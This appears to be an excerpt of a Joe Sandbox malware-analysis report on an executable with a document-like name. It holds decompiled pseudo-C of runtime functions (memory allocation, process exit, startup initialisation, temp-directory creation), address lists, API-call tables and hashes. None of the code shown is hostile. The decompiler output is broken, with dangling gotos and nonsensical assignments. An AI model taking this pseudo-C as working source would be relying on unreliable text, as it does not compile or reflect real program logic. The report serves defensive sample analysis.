							if(( *(__ebx + 1) &  *0x4bbaf4) == 0) {
								__ecx =  *(__ebx + 4) & 0x0000ffff;
								__edi =  *0x4bbaf0; // 0x0
								__eflags = __edi - ( *(__ebx + 4) & 0x0000ffff);
								if(__edi < ( *(__ebx + 4) & 0x0000ffff)) {
									__eax =  *(__ebx + 6) & 0x0000ffff;
									__edi = __eax;
									__eax = E00403BCC(__eax);
									__esi = __eax;
									__eflags = __eax;
									if(__eax != 0) {
										goto L35;
									} else {
										 *0x4bbae8 = __al;
										 *__ebx = __al;
										_pop(__edi);
										_pop(__esi);
										_pop(__ebx);
										return __eax;
									}
								} else {
									__esi =  *0x4bbaec; // 0x2290dd0
									__ecx =  *(__ebx + 6) & 0x0000ffff;
									__edx = __ecx + 0xb30;
									__eflags = __edi - __ecx + 0xb30;
									if(__edi >= __ecx + 0xb30) {
										__edi = __ecx;
									}
									__esi = __esi - __edi;
									 *0x4bbaf0 =  *0x4bbaf0 - __edi;
									 *0x4bbaec = __esi;
									goto L35;
								}
							} else {
								asm("bsf eax, esi");
								__esi = __eax * 8;
								__ecx =  *(0x4bbaf8 + __eax * 4);
								asm("bsf ecx, ecx");
								__ecx =  *(0x4bbaf8 + __eax * 4) + __eax * 8 * 4;
								__edi = 0x4bbb78 + ( *(0x4bbaf8 + __eax * 4) + __eax * 8 * 4) * 8;
								__esi =  *(__edi + 4);
								__edx =  *(__esi + 4);
								 *(__edi + 4) = __edx;
								 *__edx = __edi;
								__eflags = __edi - __edx;
								if(__edi == __edx) {
									__edx = 0xfffffffe;
									asm("rol edx, cl");
									_t38 = 0x4bbaf8 + __eax * 4;
									 *_t38 =  *(0x4bbaf8 + __eax * 4) & 0xfffffffe;
									__eflags =  *_t38;
									if( *_t38 == 0) {
										asm("btr [0x4bbaf4], eax");
									}
								}
								__edi = 0xfffffff0;
								__edi = 0xfffffff0 &  *(__esi - 4);
								__eflags = 0xfffffff0 - 0x10a60;
								if(0xfffffff0 < 0x10a60) {
									_t52 =  &((__esi - 4)[0xfffffffffffffffc]);
									 *_t52 = (__esi - 4)[0xfffffffffffffffc] & 0x000000f7;
									__eflags =  *_t52;
								} else {
									__edx = __edi;
									__edi =  *(__ebx + 6) & 0x0000ffff;
									__edx = __edx - __edi;
									__eax = __edi + __esi;
									__ecx = __edx + 3;
									 *(__eax - 4) = __ecx;
									 *(__edx + __eax - 8) = __edx;
									__eax = E00403B00(__eax, __ecx, __edx);
								}
								L35:
								_t56 = __edi + 6; // 0x6
								__ecx = _t56;
								 *(__esi - 4) = _t56;
								__eax = 0;
								 *0x4bbae8 = __al;
								 *__esi = __ebx;
								 *((intOrPtr*)(__esi + 0x10)) = 0;
								 *((intOrPtr*)(__esi + 0x14)) = 1;
								 *(__ebx + 0x18) = __esi;
								_t61 = __esi + 0x20; // 0x2290df0
								__eax = _t61;
								__ecx =  *(__ebx + 2) & 0x0000ffff;
								__edx = __ecx + __eax;
								 *(__ebx + 0x10) = __ecx + __eax;
								__edi = __edi + __esi;
								__edi = __edi - __ecx;
								__eflags = __edi;
								 *(__ebx + 0x14) = __edi;
								 *__ebx = 0;
								 *(__eax - 4) = __esi;
								_pop(__edi);
								_pop(__esi);
								_pop(__ebx);
								return __eax;
							}
						} else {
							_t19 = __edx + 0x14;
							 *_t19 =  *(__edx + 0x14) + 1;
							__eflags =  *_t19;
							 *(__ebx + 0x10) = __ecx;
							 *__ebx = 0;
							 *(__eax - 4) = __edx;
							_pop(__ebx);
							return __eax;
						}
					} else {
						 *(__edx + 0x14) =  *(__edx + 0x14) + 1;
						__ecx = 0xfffffff8 &  *(__eax - 4);
						__eflags = 0xfffffff8;
						 *(__edx + 0x10) = 0xfffffff8 &  *(__eax - 4);
						 *(__eax - 4) = __edx;
						if(0xfffffff8 == 0) {
							__ecx =  *(__edx + 8);
							 *(__ecx + 0xc) = __ebx;
							 *(__ebx + 8) = __ecx;
							 *__ebx = 0;
							_pop(__ebx);
							return __eax;
						} else {
							 *__ebx = 0;
							_pop(__ebx);
							return __eax;
						}
					}
				}
			}

0x00403ee8
0x00403ef4
0x00403efa
0x00404148
0x0040414d
0x00404260
0x00404261
0x00404263
0x00403c94
0x00403c98
0x00403c9a
0x00403ca4
0x00403cb4
0x00403cb9
0x00403cbd
0x00403cbf
0x00403cc1
0x00403cc7
0x00403cca
0x00403ccf
0x00403cd4
0x00403cda
0x00403ce0
0x00403ce3
0x00403ce5
0x00403cec
0x00403cec
0x00403cf5
0x00404269
0x00404269
0x0040426b
0x0040426b
0x00404153
0x00404153
0x0040415f
0x00404162
0x00404164
0x0040410c
0x00404111
0x00404119
0x00000000
0x00000000
0x0040411b
0x0040411d
0x00404124
0x00000000
0x00404126
0x00404128
0x00404132
0x0040413a
0x0040413e
0x00000000
0x0040413e
0x0040413a
0x00000000
0x00404124
0x0040410c
0x00404166
0x00404166
0x00404166
0x0040416e
0x00404171
0x0040417b
0x0040417b
0x00404182
0x00404195
0x00404199
0x0040419f
0x004041b8
0x004041be
0x004041be
0x004041c0
0x004041de
0x004041c2
0x004041c2
0x004041c7
0x004041c9
0x004041ce
0x004041d7
0x004041d7
0x004041e3
0x004041eb
0x004041a1
0x004041a1
0x004041ab
0x004041b3
0x00000000
0x004041b3
0x00404184
0x00404187
0x0040418a
0x004041ec
0x004041ec
0x004041ed
0x004041ee
0x004041f5
0x004041f8
0x004041fb
0x004041fe
0x00404200
0x00404202
0x00404209
0x0040420b
0x0040420b
0x0040420b
0x00404212
0x00404214
0x00404214
0x00404212
0x00404220
0x00404225
0x00404225
0x00404227
0x00404248
0x00404248
0x00404248
0x00404229
0x00404229
0x0040422f
0x00404232
0x00404236
0x0040423c
0x0040423e
0x0040423e
0x0040423c
0x0040424d
0x00404250
0x00404253
0x0040425f
0x0040425f
0x00404182
0x00403f00
0x00403f00
0x00403f02
0x00403f02
0x00403f09
0x00403f10
0x00403f68
0x00403f68
0x00403f6d
0x00403f71
0x00000000
0x00000000
0x00403f73
0x00403f73
0x00403f76
0x00403f7b
0x00403f7f
0x00403f81
0x00403f81
0x00403f84
0x00403f89
0x00403f8d
0x00403f8f
0x00403f92
0x00403f94
0x00403f9b
0x00000000
0x00403f9d
0x00403f9f
0x00403fa4
0x00403fa9
0x00403fad
0x00403fb5
0x00000000
0x00403fb5
0x00403fad
0x00403f9b
0x00403f8d
0x00000000
0x00403f7f
0x00403f68
0x00403f12
0x00403f12
0x00403f15
0x00403f18
0x00403f1d
0x00403f1f
0x00403f38
0x00403f3b
0x00403f3f
0x00403f41
0x00403f44
0x00403fbc
0x00403fbd
0x00403fbe
0x00403fc5
0x00403fc7
0x00403fc7
0x00403fcc
0x00403fd4
0x00000000
0x00000000
0x00403fd6
0x00403fd8
0x00403fdf
0x00000000
0x00403fe1
0x00403fe3
0x00403fe8
0x00403fed
0x00403ff5
0x00403ff9
0x00000000
0x00403ff9
0x00403ff5
0x00000000
0x00403fdf
0x00403fc7
0x00404000
0x00404004
0x00404004
0x0040400a
0x0040407c
0x00404080
0x00404086
0x00404088
0x004040b0
0x004040b4
0x004040b6
0x004040bb
0x004040bd
0x004040bf
0x00000000
0x004040c1
0x004040c1
0x004040c6
0x004040c8
0x004040c9
0x004040ca
0x004040cb
0x004040cb
0x0040408a
0x0040408a
0x00404090
0x00404094
0x0040409a
0x0040409c
0x0040409e
0x0040409e
0x004040a0
0x004040a2
0x004040a8
0x00000000
0x004040a8
0x0040400c
0x0040400c
0x0040400f
0x00404016
0x0040401d
0x00404020
0x00404023
0x0040402a
0x0040402d
0x00404030
0x00404033
0x00404035
0x00404037
0x00404039
0x0040403e
0x00404040
0x00404040
0x00404040
0x00404047
0x00404049
0x00404049
0x00404047
0x00404050
0x00404055
0x00404058
0x0040405e
0x004040cc
0x004040cc
0x004040cc
0x00404060
0x00404060
0x00404062
0x00404066
0x00404068
0x0040406b
0x0040406e
0x00404071
0x00404075
0x00404075
0x004040d1
0x004040d1
0x004040d1
0x004040d4
0x004040d7
0x004040d9
0x004040de
0x004040e0
0x004040e3
0x004040ea
0x004040ed
0x004040ed
0x004040f0
0x004040f4
0x004040f7
0x004040fa
0x004040fc
0x004040fc
0x004040fe
0x00404101
0x00404104
0x00404107
0x00404108
0x00404109
0x0040410a
0x0040410a
0x00403f46
0x00403f46
0x00403f46
0x00403f46
0x00403f4a
0x00403f4d
0x00403f50
0x00403f53
0x00403f54
0x00403f54
0x00403f21
0x00403f21
0x00403f25
0x00403f25
0x00403f28
0x00403f2b
0x00403f2e
0x00403f58
0x00403f5b
0x00403f5e
0x00403f61
0x00403f64
0x00403f65
0x00403f30
0x00403f30
0x00403f33
0x00403f34
0x00403f34
0x00403f2e
0x00403f1f

APIs

Sleep.KERNEL32(00000000,000000FF,00404788,00000000,0040BBE7,00000000,0040C0F5,00000000,0040C3B7,00000000,0040C3ED), ref: 00403F9F
Sleep.KERNEL32(0000000A,00000000,000000FF,00404788,00000000,0040BBE7,00000000,0040C0F5,00000000,0040C3B7,00000000,0040C3ED), ref: 00403FB5
Sleep.KERNEL32(00000000,00000000,?,000000FF,00404788,00000000,0040BBE7,00000000,0040C0F5,00000000,0040C3B7,00000000,0040C3ED), ref: 00403FE3
Sleep.KERNEL32(0000000A,00000000,00000000,?,000000FF,00404788,00000000,0040BBE7,00000000,0040C0F5,00000000,0040C3B7,00000000,0040C3ED), ref: 00403FF9

Memory Dump Source

Source File: 00000001.00000002.382758812.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.382606073.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386469518.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386595318.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386659243.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386717244.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: a5f41a95b234689400651ffc7a7e648ad6c8ae29c578f3c4a4f7439c6b153684
Instruction ID: d98b69cfe0522def9def3360e9182a2a8bb24ce33fa39324cc86f3a67812f259
Opcode Fuzzy Hash: a5f41a95b234689400651ffc7a7e648ad6c8ae29c578f3c4a4f7439c6b153684
Instruction Fuzzy Hash: 99C123B2A002018BCB15CF69EC84356BFE4EB89311F1882BFE514AB3D5D7B89941C7D8

Uniqueness

Uniqueness Score: -1.00%

Function 00407750, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 93
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E00407750() {
				void* _t20;
				void* _t23;
				intOrPtr _t31;
				intOrPtr* _t33;
				void* _t46;
				struct HINSTANCE__* _t49;
				void* _t56;

				if( *0x4b7004 != 0) {
					E00407630();
					E004076B8(_t46);
					 *0x4b7004 = 0;
				}
				if( *0x4bdbcc != 0 && GetCurrentThreadId() ==  *0x4bdbf4) {
					E00407388(0x4bdbc8);
					E0040768C(0x4bdbc8);
				}
				if( *0x004BDBC0 != 0 ||  *0x4bb054 == 0) {
					L8:
					if( *((char*)(0x4bdbc0)) == 2 &&  *0x4b7000 == 0) {
						 *0x004BDBA4 = 0;
					}
					if( *((char*)(0x4bdbc0)) != 0) {
						L14:
						E004073B0(); // executed
						if( *((char*)(0x4bdbc0)) <= 1 ||  *0x4b7000 != 0) {
							_t15 =  *0x004BDBA8;
							if( *0x004BDBA8 != 0) {
								E0040B40C(_t15);
								_t31 =  *((intOrPtr*)(0x4bdba8));
								_t8 = _t31 + 0x10; // 0x400000
								_t49 =  *_t8;
								_t9 = _t31 + 4; // 0x400000
								if(_t49 !=  *_t9 && _t49 != 0) {
									FreeLibrary(_t49);
								}
							}
						}
						E00407388(0x4bdb98);
						if( *((char*)(0x4bdbc0)) == 1) {
							 *0x004BDBBC();
						}
						if( *((char*)(0x4bdbc0)) != 0) {
							E0040768C(0x4bdb98);
						}
						if( *0x4bdb98 == 0) {
							if( *0x4bb038 != 0) {
								 *0x4bb038();
							}
							ExitProcess( *0x4b7000); // executed
						}
						memcpy(0x4bdb98,  *0x4bdb98, 0xc << 2);
						_t56 = _t56 + 0xc;
						0x4b7000 = 0x4b7000;
						0x4bdb98 = 0x4bdb98;
						goto L8;
					} else {
						_t20 = E004054B4();
						_t44 = _t20;
						if(_t20 == 0) {
							goto L14;
						} else {
							goto L13;
						}
						do {
							L13:
							E00405CE8(_t44);
							_t23 = E004054B4();
							_t44 = _t23;
						} while (_t23 != 0);
						goto L14;
					}
				} else {
					do {
						_t33 =  *0x4bb054; // 0x0
						 *0x4bb054 = 0;
						 *_t33();
					} while ( *0x4bb054 != 0);
					L8:
					while(1) {
					}
				}
			}

0x00407764
0x00407766
0x0040776b
0x00407772
0x00407772
0x0040777e
0x00407792
0x0040779c
0x0040779c
0x004077a5
0x004077c9
0x004077cd
0x004077d6
0x004077d6
0x004077dd
0x004077fc
0x004077fc
0x00407805
0x0040780c
0x00407811
0x00407813
0x00407818
0x0040781b
0x0040781b
0x0040781e
0x00407821
0x00407828
0x00407828
0x00407821
0x00407811
0x0040782f
0x00407838
0x0040783a
0x0040783a
0x00407841
0x00407845
0x00407845
0x0040784d
0x00407856
0x00407858
0x00407858
0x00407861
0x00407861
0x00407873
0x00407873
0x00407875
0x00407876
0x00000000
0x004077df
0x004077df
0x004077e4
0x004077e8
0x00000000
0x00000000
0x00000000
0x00000000
0x004077ea
0x004077ea
0x004077ec
0x004077f1
0x004077f6
0x004077f8
0x00000000
0x004077ea
0x004077b0
0x004077b0
0x004077b0
0x004077b9
0x004077be
0x004077c0
0x00000000
0x004077c9
0x00000000
0x004077c9

APIs

GetCurrentThreadId.KERNEL32 ref: 00407780
FreeLibrary.KERNEL32(00400000,?,?,?,0040788A,004054FF,00405546,?,?,0040555F,?,?,?,?,00453AEA,00000000), ref: 00407828
ExitProcess.KERNEL32(00000000,?,?,?,0040788A,004054FF,00405546,?,?,0040555F,?,?,?,?,00453AEA,00000000), ref: 00407861

Part of subcall function 004076B8: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?,0040555F), ref: 004076F1
Part of subcall function 004076B8: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?), ref: 004076F7
Part of subcall function 004076B8: GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?), ref: 00407712
Part of subcall function 004076B8: WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?), ref: 00407718

Strings

MZP, xrefs: 00407827

Memory Dump Source

Source File: 00000001.00000002.382758812.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.382606073.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386469518.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386595318.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386659243.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386717244.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
String ID: MZP
API String ID: 3490077880-2889622443
Opcode ID: 1ba9ccdc5e5ec41ea7066db700fb32a50d39e50ecd0d58aa72eac7c5645d258d
Instruction ID: 4bb8ca2865ae45d0ec72c9e6ca862cba493d08d50c1d65b63798a8296780cd14
Opcode Fuzzy Hash: 1ba9ccdc5e5ec41ea7066db700fb32a50d39e50ecd0d58aa72eac7c5645d258d
Instruction Fuzzy Hash: 76317220E087415BE721BB7A888875B76E09B45315F14897FE541A33D2D77CB884CB6F

Uniqueness

Uniqueness Score: -1.00%

Function 00407748, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 86
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E00407748() {
				intOrPtr* _t14;
				void* _t23;
				void* _t26;
				intOrPtr _t34;
				intOrPtr* _t36;
				void* _t50;
				struct HINSTANCE__* _t53;
				void* _t62;

				 *((intOrPtr*)(_t14 +  *_t14)) =  *((intOrPtr*)(_t14 +  *_t14)) + _t14 +  *_t14;
				if( *0x4b7004 != 0) {
					E00407630();
					E004076B8(_t50);
					 *0x4b7004 = 0;
				}
				if( *0x4bdbcc != 0 && GetCurrentThreadId() ==  *0x4bdbf4) {
					E00407388(0x4bdbc8);
					E0040768C(0x4bdbc8);
				}
				if( *0x004BDBC0 != 0 ||  *0x4bb054 == 0) {
					L9:
					if( *((char*)(0x4bdbc0)) == 2 &&  *0x4b7000 == 0) {
						 *0x004BDBA4 = 0;
					}
					if( *((char*)(0x4bdbc0)) != 0) {
						L15:
						E004073B0(); // executed
						if( *((char*)(0x4bdbc0)) <= 1 ||  *0x4b7000 != 0) {
							_t18 =  *0x004BDBA8;
							if( *0x004BDBA8 != 0) {
								E0040B40C(_t18);
								_t34 =  *((intOrPtr*)(0x4bdba8));
								_t8 = _t34 + 0x10; // 0x400000
								_t53 =  *_t8;
								_t9 = _t34 + 4; // 0x400000
								if(_t53 !=  *_t9 && _t53 != 0) {
									FreeLibrary(_t53);
								}
							}
						}
						E00407388(0x4bdb98);
						if( *((char*)(0x4bdbc0)) == 1) {
							 *0x004BDBBC();
						}
						if( *((char*)(0x4bdbc0)) != 0) {
							E0040768C(0x4bdb98);
						}
						if( *0x4bdb98 == 0) {
							if( *0x4bb038 != 0) {
								 *0x4bb038();
							}
							ExitProcess( *0x4b7000); // executed
						}
						memcpy(0x4bdb98,  *0x4bdb98, 0xc << 2);
						_t62 = _t62 + 0xc;
						0x4b7000 = 0x4b7000;
						0x4bdb98 = 0x4bdb98;
						goto L9;
					} else {
						_t23 = E004054B4();
						_t48 = _t23;
						if(_t23 == 0) {
							goto L15;
						} else {
							goto L14;
						}
						do {
							L14:
							E00405CE8(_t48);
							_t26 = E004054B4();
							_t48 = _t26;
						} while (_t26 != 0);
						goto L15;
					}
				} else {
					do {
						_t36 =  *0x4bb054; // 0x0
						 *0x4bb054 = 0;
						 *_t36();
					} while ( *0x4bb054 != 0);
					L9:
					while(1) {
					}
				}
			}

0x0040774a
0x00407764
0x00407766
0x0040776b
0x00407772
0x00407772
0x0040777e
0x00407792
0x0040779c
0x0040779c
0x004077a5
0x004077c9
0x004077cd
0x004077d6
0x004077d6
0x004077dd
0x004077fc
0x004077fc
0x00407805
0x0040780c
0x00407811
0x00407813
0x00407818
0x0040781b
0x0040781b
0x0040781e
0x00407821
0x00407828
0x00407828
0x00407821
0x00407811
0x0040782f
0x00407838
0x0040783a
0x0040783a
0x00407841
0x00407845
0x00407845
0x0040784d
0x00407856
0x00407858
0x00407858
0x00407861
0x00407861
0x00407873
0x00407873
0x00407875
0x00407876
0x00000000
0x004077df
0x004077df
0x004077e4
0x004077e8
0x00000000
0x00000000
0x00000000
0x00000000
0x004077ea
0x004077ea
0x004077ec
0x004077f1
0x004077f6
0x004077f8
0x00000000
0x004077ea
0x004077b0
0x004077b0
0x004077b0
0x004077b9
0x004077be
0x004077c0
0x00000000
0x004077c9
0x00000000
0x004077c9

APIs

GetCurrentThreadId.KERNEL32 ref: 00407780
FreeLibrary.KERNEL32(00400000,?,?,?,0040788A,004054FF,00405546,?,?,0040555F,?,?,?,?,00453AEA,00000000), ref: 00407828
ExitProcess.KERNEL32(00000000,?,?,?,0040788A,004054FF,00405546,?,?,0040555F,?,?,?,?,00453AEA,00000000), ref: 00407861

Part of subcall function 004076B8: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?,0040555F), ref: 004076F1
Part of subcall function 004076B8: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?), ref: 004076F7
Part of subcall function 004076B8: GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?), ref: 00407712
Part of subcall function 004076B8: WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?), ref: 00407718

Strings

MZP, xrefs: 00407827

Memory Dump Source

Source File: 00000001.00000002.382758812.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.382606073.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386469518.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386595318.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386659243.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386717244.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
String ID: MZP
API String ID: 3490077880-2889622443
Opcode ID: 1e4888025ee955e8cc7e0f2d2f1a13e961f3985afae2446d4f356ca194078bac
Instruction ID: bfc25cbdcfe625b544084418af651039c1e49876b6b13a82c314e6a817d38f33
Opcode Fuzzy Hash: 1e4888025ee955e8cc7e0f2d2f1a13e961f3985afae2446d4f356ca194078bac
Instruction Fuzzy Hash: E3314D20E087419BE721BB7A888935B7BA09B05315F14897FE541A73D2D77CB884CB6F

Uniqueness

Uniqueness Score: -1.00%

Function 004B5000, Relevance: 6.0, APIs: 4, Instructions: 43
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E004B5000(void* __ecx, void* __edx) {
				intOrPtr _t19;
				intOrPtr _t22;

				_push(_t22);
				_push(0x4b50d7);
				_push( *[fs:eax]);
				 *[fs:eax] = _t22;
				 *0x4bb98c =  *0x4bb98c - 1;
				if( *0x4bb98c < 0) {
					E00405B74();
					E004051A8();
					SetThreadLocale(0x400); // executed
					E0040A250();
					 *0x4b700c = 2;
					 *0x4bb01c = 0x4036b0;
					 *0x4bb020 = 0x4036b8;
					 *0x4bb05a = 2;
					 *0x4bb060 = E0040CAA4();
					 *0x4bb008 = 0x4095a0;
					E00405BCC(E00405BB0());
					 *0x4bb068 = 0xd7b0;
					 *0x4bb344 = 0xd7b0;
					 *0x4bb620 = 0xd7b0;
					 *0x4bb050 = GetCommandLineW();
					 *0x4bb04c = E00403810();
					 *0x4bb97c = GetACP();
					 *0x4bb980 = 0x4b0;
					 *0x4bb044 = GetCurrentThreadId();
					E0040CAB8();
				}
				_pop(_t19);
				 *[fs:eax] = _t19;
				_push(0x4b50de);
				return 0;
			}

0x004b5005
0x004b5006
0x004b500b
0x004b500e
0x004b5011
0x004b5018
0x004b501e
0x004b5023
0x004b502d
0x004b5032
0x004b5037
0x004b503e
0x004b5048
0x004b5052
0x004b505e
0x004b5063
0x004b5072
0x004b5077
0x004b5080
0x004b5089
0x004b5097
0x004b50a1
0x004b50ab
0x004b50b0
0x004b50bf
0x004b50c4
0x004b50c4
0x004b50cb
0x004b50ce
0x004b50d1
0x004b50d6

APIs

SetThreadLocale.KERNEL32(00000400,00000000,004B50D7), ref: 004B502D

Part of subcall function 0040A250: InitializeCriticalSection.KERNEL32(004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A255
Part of subcall function 0040A250: GetVersion.KERNEL32(004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A263
Part of subcall function 0040A250: GetModuleHandleW.KERNEL32(kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A28A
Part of subcall function 0040A250: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A290
Part of subcall function 0040A250: GetModuleHandleW.KERNEL32(kernel32.dll,SetThreadPreferredUILanguages,00000000,kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A2A4
Part of subcall function 0040A250: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A2AA
Part of subcall function 0040A250: GetModuleHandleW.KERNEL32(kernel32.dll,GetThreadUILanguage,00000000,kernel32.dll,SetThreadPreferredUILanguages,00000000,kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A2BE
Part of subcall function 0040A250: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A2C4

Part of subcall function 0040CAA4: GetSystemInfo.KERNEL32 ref: 0040CAA8

GetCommandLineW.KERNEL32(00000400,00000000,004B50D7), ref: 004B5092

Part of subcall function 00403810: GetStartupInfoW.KERNEL32 ref: 00403821

GetACP.KERNEL32(00000400,00000000,004B50D7), ref: 004B50A6
GetCurrentThreadId.KERNEL32 ref: 004B50BA

Part of subcall function 0040CAB8: GetVersion.KERNEL32(004B50C9,00000400,00000000,004B50D7), ref: 0040CAB8

Memory Dump Source

Source File: 00000001.00000002.382758812.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.382606073.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386469518.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386595318.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386659243.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386717244.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: AddressHandleModuleProc$InfoThreadVersion$CommandCriticalCurrentInitializeLineLocaleSectionStartupSystem
String ID:
API String ID: 2740004594-0
Opcode ID: aeeb1ef19c021384e5e919f33d2f1f63d534ea4b25bb20b8f726cabb6b9d9f22
Instruction ID: 4c04e7183c3d5c6504f231a905193e891933426fc174ea8e71756e1f90614aff
Opcode Fuzzy Hash: aeeb1ef19c021384e5e919f33d2f1f63d534ea4b25bb20b8f726cabb6b9d9f22
Instruction Fuzzy Hash: 46111CB04047449FE311BF76A8062267BA8EB05309B508A7FE110662E2EBFD15048FEE

Uniqueness

Uniqueness Score: -1.00%

Function 004AEFE8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 73%

			E004AEFE8(void* __eax, long __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char* _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				int _t30;
				intOrPtr _t63;
				void* _t71;
				void* _t73;
				intOrPtr _t75;
				intOrPtr _t76;

				_t71 = __edi;
				_t54 = __ebx;
				_t75 = _t76;
				_t55 = 4;
				do {
					_push(0);
					_push(0);
					_t55 = _t55 - 1;
				} while (_t55 != 0);
				_push(_t55);
				_push(__ebx);
				_t73 = __eax;
				_t78 = 0;
				_push(_t75);
				_push(0x4af0e1);
				_push( *[fs:eax]);
				 *[fs:eax] = _t76;
				while(1) {
					E00422D70( &_v12, _t54, _t55, _t78); // executed
					_t55 = L".tmp";
					E004AEEC8(0, _t54, L".tmp", _v12, _t71, _t73,  &_v8); // executed
					_t30 = CreateDirectoryW(E004084EC(_v8), 0); // executed
					if(_t30 != 0) {
						break;
					}
					_t54 = GetLastError();
					_t78 = _t54 - 0xb7;
					if(_t54 != 0xb7) {
						E00426F08(0x3d,  &_v32, _v8);
						_v28 = _v32;
						E00419E18( &_v36, _t54, 0);
						_v24 = _v36;
						E004232EC(_t54,  &_v40);
						_v20 = _v40;
						E00426ED8(0x81, 2,  &_v28,  &_v16);
						_t55 = _v16;
						E0041F264(_v16, 1);
						E0040711C();
					}
				}
				E00407E00(_t73, _v8);
				__eflags = 0;
				_pop(_t63);
				 *[fs:eax] = _t63;
				_push(E004AF0E8);
				E00407A80( &_v40, 3);
				return E00407A80( &_v16, 3);
			}

0x004aefe8
0x004aefe8
0x004aefe9
0x004aefeb
0x004aeff0
0x004aeff0
0x004aeff2
0x004aeff4
0x004aeff4
0x004aeff7
0x004aeff8
0x004aeffa
0x004aeffc
0x004aeffe
0x004aefff
0x004af004
0x004af007
0x004af00a
0x004af011
0x004af019
0x004af020
0x004af030
0x004af037
0x00000000
0x00000000
0x004af03e
0x004af040
0x004af046
0x004af056
0x004af05e
0x004af06a
0x004af072
0x004af07a
0x004af082
0x004af091
0x004af096
0x004af0a0
0x004af0a5
0x004af0a5
0x004af046
0x004af0b4
0x004af0b9
0x004af0bb
0x004af0be
0x004af0c1
0x004af0ce
0x004af0e0

APIs

CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,004AF0E1,?,?,?,00000003,00000000,00000000,?,004B619F), ref: 004AF030
GetLastError.KERNEL32(00000000,00000000,?,00000000,004AF0E1,?,?,?,00000003,00000000,00000000,?,004B619F), ref: 004AF039

Strings

.tmp, xrefs: 004AF019

Memory Dump Source

Source File: 00000001.00000002.382758812.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

